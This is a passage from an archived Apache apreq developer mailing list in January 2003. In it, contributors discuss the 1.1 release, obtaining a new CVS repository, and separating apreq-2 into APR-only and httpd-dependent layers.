endure. At least then, it's just technical obstacles that we will face. -- Joe Schaefer From [email protected] Sun Jan 12 02:58:30 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 56491 invoked by uid 500); 12 Jan 2003 02:58:30 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 56451 invoked from network); 12 Jan 2003 02:58:29 -0000 Message-ID: <[email protected]> Date: Sun, 12 Jan 2003 13:59:07 +1100 From: Stas Bekman <[email protected]> Organization: Hope, Humanized User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1) Gecko/20020826 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Joe Schaefer <[email protected]> Cc: apreq list <[email protected]> Subject: Re: cvs tagged as v1_1 (was Re: 1.1_rc4) References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Joe Schaefer wrote: > Stas Bekman <[email protected]> writes: > > [...] > > >>We all agree that waiting for httpd people to give a grace is a complete >>waste of time. I suggest that we ask Brian Behlendorf to create the >>apreq-2.0 repository and start working there. It's important for >>preserving the history of changes. I see no reason why not to do it >>*now*. Having a repository doesn't mean having a production version of >>the code. > > > Yes, agreed- that would be best. Unfortunately, according to > /home/cvs/README, the first step in creating a new cvs repository is: > > (a) Get permission from your PMC. The PMC must approve the addition > of any repository and should be contacted through the normal means. > > That puts us back at square one, since (I think) our PMC is httpd. > I haven't yet lowered my self-esteem enough to now beg them for a > new repository to begin our work. > > If there's a way to make things happen within our existing > repository, that'd be a lot less painful for me to endure. > At least then, it's just technical obstacles that we will face. Let me run this through the asf members list. I have no clue what's the status of the apreq project is. I thought it was a standalone project with its own pmc. Hopefully this can be resolved quickly. I pretty much doubt anybody at httpd will be against creating a new apreq-2.0 rep. or is it httpd-apreq-2.0? __________________________________________________________________ Stas Bekman JAm_pH ------> Just Another mod_perl Hacker http://stason.org/ mod_perl Guide ---> http://perl.apache.org mailto:[email protected] http://use.perl.org http://apacheweek.com http://modperlbook.org http://apache.org http://ticketmaster.com From [email protected] Mon Jan 13 02:09:35 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 59758 invoked by uid 500); 13 Jan 2003 02:09:35 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 59744 invoked from network); 13 Jan 2003 02:09:34 -0000 Sender: [email protected] Message-ID: <[email protected]> Date: Mon, 13 Jan 2003 04:03:42 +0200 From: Eli Marmor <[email protected]> Organization: Netmask (El-Mar) Internet Technologies X-Mailer: Mozilla 4.08 [Hebrew Support by elmar.co.il (X11; I; Linux 2.4.8-26mdk i686) MIME-Version: 1.0 To: apreq list <[email protected]> Subject: Re: cvs tagged as v1_1 (was Re: 1.1_rc4) References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Content-Type: text/plain; charset=iso-8859-8 Content-Transfer-Encoding: 7bit X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Let me continue the idea that I raised in the past, because I believe it may help convince ASF to adopt apreq into the main source tree: We should separate the code to two layers; The lower will depend only on APR/APR-UTIL, and not on Apache. For example, it will contain the parsing of parameters. The APR/APR-UTIL developers will be happy to adopt it, because it is thin on one hand, yet makes APR a strong library for anybody: CGI-BIN developers, FastCGI, etc. It is pity that a library like APR with so much potential, is wasted today, just because it doesn't have any real benefit outside Apache (I think that there is only ONE project - subversion - that uses it except for Apache). The lower layer of apreq is just the missing piece that may make APR a real killer. The higher layer will be built on the lower one and use it. It will contain all the stuff that is Apache-dependent, such as reading from and writing to bucket/brigades. After the lower layer was added to APR, it will be easier to convince the members to adopt it too (to httpd of course, not to APR). Maybe it should be even a part of the core (and not just a yet another module), or at least a "must" module, so other modules can use it without caring if it was compiled-in and enabled. -- Eli Marmor [email protected] CTO, Founder Netmask (El-Mar) Internet Technologies Ltd. __________________________________________________________ Tel.: 970-824-1244 8 Yad-Harutzim St. Fax.: 970-824-1244 P.O.B. 7004 Mobile: +972-50-23-7338 Kfar-Saba 44641, Israel From [email protected] Mon Jan 13 02:28:56 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 70333 invoked by uid 500); 13 Jan 2003 02:28:55 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 70322 invoked from network); 13 Jan 2003 02:28:55 -0000 Message-ID: <[email protected]> Date: Mon, 13 Jan 2003 13:29:33 +1100 From: Stas Bekman <[email protected]> Organization: Hope, Humanized User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1) Gecko/20020826 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Eli Marmor <[email protected]> Cc: apreq list <[email protected]> Subject: Re: cvs tagged as v1_1 (was Re: 1.1_rc4) References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Eli Marmor wrote: > Let me continue the idea that I raised in the past, because I believe > it may help convince ASF to adopt apreq into the main source tree: > > We should separate the code to two layers; The lower will depend only > on APR/APR-UTIL, and not on Apache. For example, it will contain the > parsing of parameters. The APR/APR-UTIL developers will be happy to > adopt it, because it is thin on one hand, yet makes APR a strong > library for anybody: CGI-BIN developers, FastCGI, etc. It is pity that > a library like APR with so much potential, is wasted today, just > because it doesn't have any real benefit outside Apache (I think that > there is only ONE project - subversion - that uses it except for > Apache). The lower layer of apreq is just the missing piece that may > make APR a real killer. > > The higher layer will be built on the lower one and use it. It will > contain all the stuff that is Apache-dependent, such as reading from > and writing to bucket/brigades. After the lower layer was added to APR, > it will be easier to convince the members to adopt it too (to httpd of > course, not to APR). Maybe it should be even a part of the core (and > not just a yet another module), or at least a "must" module, so other > modules can use it without caring if it was compiled-in and enabled. We have offered to do whatever changes required to get the lib into the core. However the idea wasn't accepted. So it'd be silly to spend time on something that won't help the library to get accepted into the core, because there are so many other things that still weren't ported to 2.0. Therefore currently the goal is to complete the library porting to 2.0, so the glues for other languages could be written. If I undestand well what you are offerring, this can happen internally without affecting the external API. So if anybody is interested in doing a further layering (because they have the need for it or just for fun) they are welcome to do so, once the new repository is created and populated. __________________________________________________________________ Stas Bekman JAm_pH ------> Just Another mod_perl Hacker http://stason.org/ mod_perl Guide ---> http://perl.apache.org mailto:[email protected] http://use.perl.org http://apacheweek.com http://modperlbook.org http://apache.org http://ticketmaster.com From [email protected] Mon Jan 13 02:36:47 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 72770 invoked by uid 500); 13 Jan 2003 02:36:47 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 72757 invoked from network); 13 Jan 2003 02:36:46 -0000 Sender: [email protected] Message-ID: <[email protected]> Date: Mon, 13 Jan 2003 04:31:02 +0200 From: Eli Marmor <[email protected]> Organization: Netmask (El-Mar) Internet Technologies X-Mailer: Mozilla 4.08 [Hebrew Support by elmar.co.il (X11; I; Linux 2.4.8-26mdk i686) MIME-Version: 1.0 To: apreq list <[email protected]> Subject: Re: cvs tagged as v1_1 (was Re: 1.1_rc4) References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Content-Type: text/plain; charset=iso-8859-8 Content-Transfer-Encoding: 7bit X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Stas Bekman wrote: > We have offered to do whatever changes required to get the lib into the > core. However the idea wasn't accepted. So it'd be silly to spend time > on something that won't help the library to get accepted into the core, > because there are so many other things that still weren't ported to 2.0. > > Therefore currently the goal is to complete the library porting to 2.0, > so the glues for other languages could be written. If I undestand well > what you are offerring, this can happen internally without affecting the > external API. So if anybody is interested in doing a further layering > (because they have the need for it or just for fun) they are welcome to > do so, once the new repository is created and populated. Theoretically, you are right. But practically - no. For example: There are functions that should belong to the lower layer, but currently get request_rec as a parameter. So the separation that I'm talking about, is not only internal. However, I still believe that it is not too complex. > Eli Marmor wrote: > > Let me continue the idea that I raised in the past, because I believe > > it may help convince ASF to adopt apreq into the main source tree: > > > > We should separate the code to two layers; The lower will depend only > > on APR/APR-UTIL, and not on Apache. For example, it will contain the > > parsing of parameters. The APR/APR-UTIL developers will be happy to > > adopt it, because it is thin on one hand, yet makes APR a strong > > library for anybody: CGI-BIN developers, FastCGI, etc. It is pity that > > a library like APR with so much potential, is wasted today, just > > because it doesn't have any real benefit outside Apache (I think that > > there is only ONE project - subversion - that uses it except for > > Apache). The lower layer of apreq is just the missing piece that may > > make APR a real killer. > > > > The higher layer will be built on the lower one and use it. It will > > contain all the stuff that is Apache-dependent, such as reading from > > and writing to bucket/brigades. After the lower layer was added to APR, > > it will be easier to convince the members to adopt it too (to httpd of > > course, not to APR). Maybe it should be even a part of the core (and > > not just a yet another module), or at least a "must" module, so other > > modules can use it without caring if it was compiled-in and enabled. -- Eli Marmor [email protected] CTO, Founder Netmask (El-Mar) Internet Technologies Ltd. __________________________________________________________ Tel.: 970-824-1244 8 Yad-Harutzim St. Fax.: 970-824-1244 P.O.B. 7004 Mobile: +972-50-23-7338 Kfar-Saba 44641, Israel From [email protected] Mon Jan 13 04:23:59 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 7368 invoked by uid 500); 13 Jan 2003 04:23:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 7357 invoked from network); 13 Jan 2003 04:23:58 -0000 To: Eli Marmor <[email protected]> Cc: apreq list <[email protected]> Subject: Re: cvs tagged as v1_1 (was Re: 1.1_rc4) References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> From: Joe Schaefer <[email protected]> Date: 12 Jan 2003 23:30:15 -0500 Message-ID: <[email protected]> Lines: 28 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.5 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Eli Marmor <[email protected]> writes: > Let me continue the idea that I raised in the past, because I believe > it may help convince ASF to adopt apreq into the main source tree: It's not easy to convince people of something without first involving them in the discussion. Stas tried; I tried. Maybe three's a charm. I wish you the best of luck. > We should separate the code to two layers; The lower will depend only > on APR/APR-UTIL, There was talk recently on dev@ about moving apr_buckets out of apr-util and into httpd. If that happens it'd be a shame, but sometimes thems the breaks. If you're serious about making apreq-2 operate sans-httpd, by all means do it. Just don't do it for apr/httpd's sake, because their lack of enthusiasm about apreq-2 will probably just frustrate you. It sure frustrates me. So, do it for *our* users instead. At the very least it would lead to a nice set of unit tests for apreq-2, since you'll have to write those to prove it actually works. And if it does work, it will definitely go into *our* distribution. -- Joe Schaefer From [email protected] Mon Jan 13 08:31:07 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 92599 invoked by uid 500); 13 Jan 2003 08:31:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 92574 invoked from network); 13 Jan 2003 08:31:05 -0000 Sender: [email protected] Message-ID: <[email protected]> Date: Mon, 13 Jan 2003 10:25:24 +0200 From: Eli Marmor <[email protected]> Organization: Netmask (El-Mar) Internet Technologies X-Mailer: Mozilla 4.08 [Hebrew Support by elmar.co.il (X11; I; Linux 2.4.8-26mdk i686) MIME-Version: 1.0 To: apreq list <[email protected]> Subject: Re: cvs tagged as v1_1 (was Re: 1.1_rc4) References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Content-Type: text/plain; charset=iso-8859-8 Content-Transfer-Encoding: 7bit X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Joe Schaefer wrote: > It's not easy to convince people of something without first > involving them in the discussion. Stas tried; I tried. > Maybe three's a charm. I wish you the best of luck. I know, I know... And I've already experienced that. In addition, as a lurker of that list, I've already witnessed several cases of others (you mentioned one of them - "El-Kabong"). I just hope that it will be easier with APR/APR-UTIL. Because apreq is not only based on APR/APR-UTIL, but does things that APR/APR-UTIL must have, like parsing a parameters string. Then, after integrating the lower level parts of apreq into APR, it may be easier to discuss the integration of the higher parts into httpd. > If you're serious about making apreq-2 operate sans-httpd, > by all means do it. Just don't do it for apr/httpd's sake, > because their lack of enthusiasm about apreq-2 will probably > just frustrate you. It sure frustrates me. > > So, do it for *our* users instead. At the very least it would > lead to a nice set of unit tests for apreq-2, since you'll have > to write those to prove it actually works. And if it does work, > it will definitely go into *our* distribution. Relax ;-) *IF* I do it (spare time matters...), I will do it neither for them NOR for our users, but for me (well, I guess that my own benefit will be very minor in comparison with the benefit of all the users, but it is enough to justify such an effort). And I think not only about CGI-BIN authors or FastCGI, but also about module authors: I developed a layer that emulates the basic functionality of the filters, so simple modules can be tested/profiled standalone, without being attached to Apache (it is very ugly and works only with limited modules, so I'm afraid to publish source code...). Such modules can be linked to the lower level of apreq too, once it is separated (well, I can also improve my filtering emulation... but I prefer this way...). Ehhhh.... and something else: I wrote that not only the internal structure will have to change, but also the API; After thinking about it a little more, I think that it can be done in a way that will keep backward compatibility. In any case, I don't do anything before having a more up-to-date version of apreq-2 (my current one is from August). -- Eli Marmor [email protected] CTO, Founder Netmask (El-Mar) Internet Technologies Ltd. __________________________________________________________ Tel.: 970-824-1244 8 Yad-Harutzim St. Fax.: 970-824-1244 P.O.B. 7004 Mobile: +972-50-23-7338 Kfar-Saba 44641, Israel From [email protected] Mon Jan 13 09:03:37 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 14186 invoked by uid 500); 13 Jan 2003 09:03:36 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 14172 invoked from network); 13 Jan 2003 09:03:36 -0000 Message-ID: <07e101c2bae2$ad398b40$3f0aa8c0@fmenc001dev> From: "Issac Goldstand" <[email protected]> To: "Eli Marmor" <[email protected]> Cc: "apreq list" <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Subject: Re: cvs tagged as v1_1 (was Re: 1.1_rc4) Date: Mon, 13 Jan 2003 11:03:42 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-8" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1106 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Eli, Could you elaborate a bit on exactly what you would consider to be high-level and what low-level? Are you trying to say that we could make low-level parsers which could, for example, be plugged into an SMTP module for Apache to look at MIME encoded messages using the same "low-level" code as HTTP's multipart forms? I hope I'm on the right track here, and if so, I like the idea. But could you think of a good list of items to be put in the high-level and a list for the low-level? Issac ----- Original Message ----- From: "Eli Marmor" Subject: Re: cvs tagged as v1_1 (was Re: 1.1_rc4) > Stas Bekman wrote: > > > We have offered to do whatever changes required to get the lib into the > > core. However the idea wasn't accepted. So it'd be silly to spend time > > on something that won't help the library to get accepted into the core, > > because there are so many other things that still weren't ported to 2.0. > > > > Therefore currently the goal is to complete the library porting to 2.0, > > so the glues for other languages could be written. If I undestand well > > what you are offerring, this can happen internally without affecting the > > external API. So if anybody is interested in doing a further layering > > (because they have the need for it or just for fun) they are welcome to > > do so, once the new repository is created and populated. > > Theoretically, you are right. But practically - no. > > For example: There are functions that should belong to the lower layer, > but currently get request_rec as a parameter. > > So the separation that I'm talking about, is not only internal. > > However, I still believe that it is not too complex. > > > Eli Marmor wrote: > > > Let me continue the idea that I raised in the past, because I believe > > > it may help convince ASF to adopt apreq into the main source tree: > > > > > > We should separate the code to two layers; The lower will depend only > > > on APR/APR-UTIL, and not on Apache. For example, it will contain the > > > parsing of parameters. The APR/APR-UTIL developers will be happy to > > > adopt it, because it is thin on one hand, yet makes APR a strong > > > library for anybody: CGI-BIN developers, FastCGI, etc. It is pity that > > > a library like APR with so much potential, is wasted today, just > > > because it doesn't have any real benefit outside Apache (I think that > > > there is only ONE project - subversion - that uses it except for > > > Apache). The lower layer of apreq is just the missing piece that may > > > make APR a real killer. > > > > > > The higher layer will be built on the lower one and use it. It will > > > contain all the stuff that is Apache-dependent, such as reading from > > > and writing to bucket/brigades. After the lower layer was added to APR, > > > it will be easier to convince the members to adopt it too (to httpd of > > > course, not to APR). Maybe it should be even a part of the core (and > > > not just a yet another module), or at least a "must" module, so other > > > modules can use it without caring if it was compiled-in and enabled. > > -- > Eli Marmor > [email protected] > CTO, Founder > Netmask (El-Mar) Internet Technologies Ltd. > __________________________________________________________ > Tel.: 970-824-1244 8 Yad-Harutzim St. > Fax.: 970-824-1244 P.O.B. 7004 > Mobile: +972-50-23-7338 Kfar-Saba 44641, Israel > From [email protected] Mon Jan 13 09:08:59 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 17523 invoked by uid 500); 13 Jan 2003 09:08:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 17511 invoked from network); 13 Jan 2003 09:08:58 -0000 Message-ID: <080101c2bae3$26dd6020$3f0aa8c0@fmenc001dev> From: "Issac Goldstand" <[email protected]> To: "Joe Schaefer" <[email protected]> Cc: "apreq list" <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Subject: Re: cvs tagged as v1_1 (was Re: 1.1_rc4) Date: Mon, 13 Jan 2003 11:07:04 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1106 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N I'm thinking that while apreq is going to be difficult to get into the main httpd source tree, perhaps we might find it easier to convince them to adopt some of the functions (I think what Eli referred to as "low-level functions" in a previous email) as part of the apr-utils package. I could see it fitting in there... Issac ----- Original Message ----- From: "Joe Schaefer" <[email protected]> To: "Eli Marmor" <[email protected]> Cc: "apreq list" <[email protected]> Sent: Monday, January 13, 2003 6:30 AM Subject: Re: cvs tagged as v1_1 (was Re: 1.1_rc4) > Eli Marmor <[email protected]> writes: > > > Let me continue the idea that I raised in the past, because I believe > > it may help convince ASF to adopt apreq into the main source tree: > > It's not easy to convince people of something without first > involving them in the discussion. Stas tried; I tried. > Maybe three's a charm. I wish you the best of luck. > > > We should separate the code to two layers; The lower will depend only > > on APR/APR-UTIL, > > There was talk recently on dev@ about moving apr_buckets out of > apr-util and into httpd. If that happens it'd be a shame, but > sometimes thems the breaks. > > If you're serious about making apreq-2 operate sans-httpd, > by all means do it. Just don't do it for apr/httpd's sake, > because their lack of enthusiasm about apreq-2 will probably > just frustrate you. It sure frustrates me. > > So, do it for *our* users instead. At the very least it would > lead to a nice set of unit tests for apreq-2, since you'll have > to write those to prove it actually works. And if it does work, > it will definitely go into *our* distribution. > > -- > Joe Schaefer > From [email protected] Mon Jan 13 09:41:56 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 38546 invoked by uid 500); 13 Jan 2003 09:41:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 38503 invoked from network); 13 Jan 2003 09:41:55 -0000 Sender: [email protected] Message-ID: <[email protected]> Date: Mon, 13 Jan 2003 11:36:14 +0200 From: Eli Marmor <[email protected]> Organization: Netmask (El-Mar) Internet Technologies X-Mailer: Mozilla 4.08 [Hebrew Support by elmar.co.il (X11; I; Linux 2.4.8-26mdk i686) MIME-Version: 1.0 To: apreq list <[email protected]> Subject: Re: cvs tagged as v1_1 (was Re: 1.1_rc4) References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <07e101c2bae2$ad398b40$3f0aa8c0@fmenc001dev> Content-Type: text/plain; charset=iso-8859-8 Content-Transfer-Encoding: 7bit X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Issac Goldstand wrote: > Eli, > Could you elaborate a bit on exactly what you would consider to be > high-level and what low-level? Are you trying to say that we could make > low-level parsers which could, for example, be plugged into an SMTP module > for Apache to look at MIME encoded messages using the same "low-level" code > as HTTP's multipart forms? I hope I'm on the right track here, and if so, I > like the idea. But could you think of a good list of items to be put in the > high-level and a list for the low-level? I don't have an existing list, but the following example may clear my idea: Let's take apreq_request_new (I use the terminology of apreq-2): The only justification of requiring the request_rec is the pool. So we can move the code of the function to a sub-function (called "apr_request_new") and leave only the following in the original function: apreq_request_t *apreq_request_new(request_rec *r) { return apr_request_new(r->pool); } (some of the fields of request_rec, like args and the headers, will have to be passed by the higher level functions to the lower level ones, or - alternatively - to be added to apreq_request_t). Of course, this is a simple example. Sometimes, it may be trickier. Especially in cases like multipart POSTs, where the parsing and handling is needed in APR (i.e. CGI, FastCGI, etc.), but the reading of the block (or - more precisely - reading from the input filter) - should be left to the higher level. But it is still easier than the effort of porting to Apache-2; Contrary to THAT effort, most of the work here is copy-paste... -- Eli Marmor [email protected] CTO, Founder Netmask (El-Mar) Internet Technologies Ltd. __________________________________________________________ Tel.: 970-824-1244 8 Yad-Harutzim St. Fax.: 970-824-1244 P.O.B. 7004 Mobile: +972-50-23-7338 Kfar-Saba 44641, Israel From [email protected] Mon Jan 13 13:14:54 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 79807 invoked by uid 500); 13 Jan 2003 13:14:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 79766 invoked from network); 13 Jan 2003 13:14:52 -0000 To: Eli Marmor <[email protected]> Cc: apreq list <[email protected]> Subject: Re: cvs tagged as v1_1 (was Re: 1.1_rc4) References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> From: Joe Schaefer <[email protected]> Date: 13 Jan 2003 08:21:01 -0500 In-Reply-To: Eli Marmor's message of "Mon, 13 Jan 2003 10:25:24 +0200" Message-ID: <[email protected]> Lines: 58 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.5 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Eli Marmor <[email protected]> writes: > Joe Schaefer wrote: [...] > > So, do it for *our* users instead. At the very least it would > > lead to a nice set of unit tests for apreq-2, since you'll have > > to write those to prove it actually works. And if it does work, > > it will definitely go into *our* distribution. > > Relax ;-) > *IF* I do it (spare time matters...), I will do it neither for them > NOR for our users, but for me (well, I guess that my own benefit will > be very minor in comparison with the benefit of all the users, but it > is enough to justify such an effort). Of course. But what I'm trying to express to you is this: If you're arguing for a redesign of apreq, it is no longer compelling to say things like "do it this way, so project-X will incorporate it into their distribution". BTDTGTTS. The case you need to make *here* is that such changes would benefit the apreq-2 distribution itself, because that's what *our* users will care about. You could make a great start at that by just designing an abstract environment for apreq_cookies to live in. You basically just need to develop abstractions for "bake" and "parse". What I would suggest is adding an "env" vtable to apreq_cookie: struct apreq_cookie_env_t { /* apreq_cookie to server header vtable */ /* some function pointers */ *parse; *bake; /* maybe a pool, etc */ } > I developed a layer that emulates the basic functionality of the > filters, so simple modules can be tested/profiled standalone, without > being attached to Apache (it is very ugly and works only with limited > modules, so I'm afraid to publish source code...). Very cool- keep it handy so we can bang on it here (eventually). [...] > In any case, I don't do anything before having a more up-to-date > version of apreq-2 (my current one is from August). OK. -- Joe Schaefer From [email protected] Mon Jan 13 17:58:12 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 51291 invoked by uid 500); 13 Jan 2003 17:58:11 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 51278 invoked from network); 13 Jan 2003 17:58:11 -0000 Date: Mon, 13 Jan 2003 09:58:16 -0800 Mime-Version: 1.0 (Apple Message framework v551) Content-Type: text/plain; charset=US-ASCII; format=flowed Subject: 1.1 Release? From: David Wheeler <[email protected]> To: [email protected] Content-Transfer-Encoding: 7bit Message-Id: <[email protected]> X-Mailer: Apple Mail (2.551) X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Hi All, Anyone got an idea when 1.1 will be formally released? I've written an update to my MacDevCenter.com article that ORA would like to publish on Friday, but I'd rather not publish it until 1.1 has been released. Think there's a chance that 1.1 will be released by then? Thanks, David -- David Wheeler AIM: dwTheory [email protected] ICQ: 15726394 http://david.wheeler.net/ Yahoo!: dew7e Jabber: [email protected] From [email protected] Mon Jan 13 22:49:47 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 69225 invoked by uid 500); 13 Jan 2003 22:49:46 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 69212 invoked from network); 13 Jan 2003 22:49:46 -0000 Message-ID: <[email protected]> Date: Tue, 14 Jan 2003 09:50:24 +1100 From: Stas Bekman <[email protected]> Organization: Hope, Humanized User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1) Gecko/20020826 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Eli Marmor <[email protected]> Cc: apreq list <[email protected]> Subject: Re: cvs tagged as v1_1 (was Re: 1.1_rc4) References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <07e101c2bae2$ad398b40$3f0aa8c0@fmenc001dev> <[email protected]> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Eli Marmor wrote: [...] > The only justification of requiring the request_rec is the pool. > So we can move the code of the function to a sub-function (called > "apr_request_new") and leave only the following in the original > function: [...] you do need the pool variable because we now use that much cleaner way to allocate memory in apreq-2.0. So instead of requiring request_rec, the API could ask directly for the pool. That pool can be easily created by other apps (not httpd) since apr will be already linked in. So I suppose what you suggest (in this example) is to use only the really needed elements in the API, rather than passing more app-specific objects, which is the case with request_rec. __________________________________________________________________ Stas Bekman JAm_pH ------> Just Another mod_perl Hacker http://stason.org/ mod_perl Guide ---> http://perl.apache.org mailto:[email protected] http://use.perl.org http://apacheweek.com http://modperlbook.org http://apache.org http://ticketmaster.com From [email protected] Tue Jan 14 04:01:09 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 59761 invoked by uid 500); 14 Jan 2003 04:01:09 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 59748 invoked from network); 14 Jan 2003 04:01:08 -0000 Message-ID: <[email protected]> Date: Tue, 14 Jan 2003 15:01:50 +1100 From: Stas Bekman <[email protected]> Organization: Hope, Humanized User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1) Gecko/20020826 X-Accept-Language: en-us, en MIME-Version: 1.0 Cc: Joe Schaefer <[email protected]>, apreq list <[email protected]> 